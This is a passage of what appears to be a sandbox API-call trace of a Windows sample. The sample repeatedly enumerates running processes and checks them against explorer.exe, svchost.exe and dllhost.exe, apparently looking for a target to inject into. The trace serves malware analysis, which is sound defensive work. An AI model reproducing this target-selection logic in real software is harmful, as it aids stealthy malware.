dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0225.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0225.912] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.912] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.912] CloseHandle (hObject=0xec) returned 1 [0225.913] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0225.913] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0225.913] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0225.913] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0225.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0225.913] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.913] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.913] CloseHandle (hObject=0xec) returned 1 [0225.913] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0225.913] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0225.913] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0225.913] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0225.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0225.914] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.914] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.914] CloseHandle (hObject=0xec) returned 1 [0225.914] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0225.914] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0225.914] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0225.914] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0225.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0225.915] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.915] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.915] CloseHandle (hObject=0xec) returned 1 [0225.915] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0225.915] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0225.915] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0225.915] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0225.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0225.916] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.916] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.916] CloseHandle (hObject=0xec) returned 1 [0225.916] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0225.916] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0225.916] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0225.916] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0225.917] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0225.917] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0225.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0225.918] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0225.919] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0225.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0225.919] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0225.920] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.920] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.920] CloseHandle (hObject=0xec) returned 1 [0225.920] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0225.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0225.921] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.921] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.921] CloseHandle (hObject=0xec) returned 1 [0225.921] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0225.922] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0225.922] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.922] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.922] CloseHandle (hObject=0xec) returned 1 [0225.922] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0225.922] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0225.923] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.923] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.923] CloseHandle (hObject=0xec) returned 1 [0225.923] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.924] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0225.924] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.924] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.924] CloseHandle (hObject=0xec) returned 1 [0225.924] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0225.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0225.925] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.925] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0225.925] CloseHandle (hObject=0xec) returned 1 [0225.925] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0225.925] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0225.925] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0225.925] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0225.926] CloseHandle (hObject=0xe8) returned 1 [0225.926] Sleep (dwMilliseconds=0x3e8) [0226.952] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0226.954] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0226.955] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0226.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0226.956] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0226.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0226.956] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0226.957] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0226.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0226.958] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0226.958] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0226.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0226.959] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0226.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0226.959] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0226.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0226.960] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0226.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0226.961] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0226.961] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0226.962] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0226.963] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0226.963] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0226.964] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0226.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0226.964] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0226.965] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0226.966] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0226.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0226.966] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.966] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.966] CloseHandle (hObject=0xec) returned 1 [0226.966] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0226.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0226.967] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0226.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0226.968] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.968] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.968] CloseHandle (hObject=0xec) returned 1 [0226.968] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0226.969] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0226.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0226.969] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0226.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0226.970] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.970] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.970] CloseHandle (hObject=0xec) returned 1 [0226.970] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0226.970] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0226.970] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0226.970] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0226.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0226.971] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.971] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.971] CloseHandle (hObject=0xec) returned 1 [0226.971] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0226.971] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0226.971] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0226.971] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0226.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0226.971] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.971] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.972] CloseHandle (hObject=0xec) returned 1 [0226.972] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0226.972] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0226.972] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0226.972] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0226.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0226.972] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.972] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.972] CloseHandle (hObject=0xec) returned 1 [0226.972] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0226.972] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0226.973] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0226.973] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0226.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0226.973] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.973] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.973] CloseHandle (hObject=0xec) 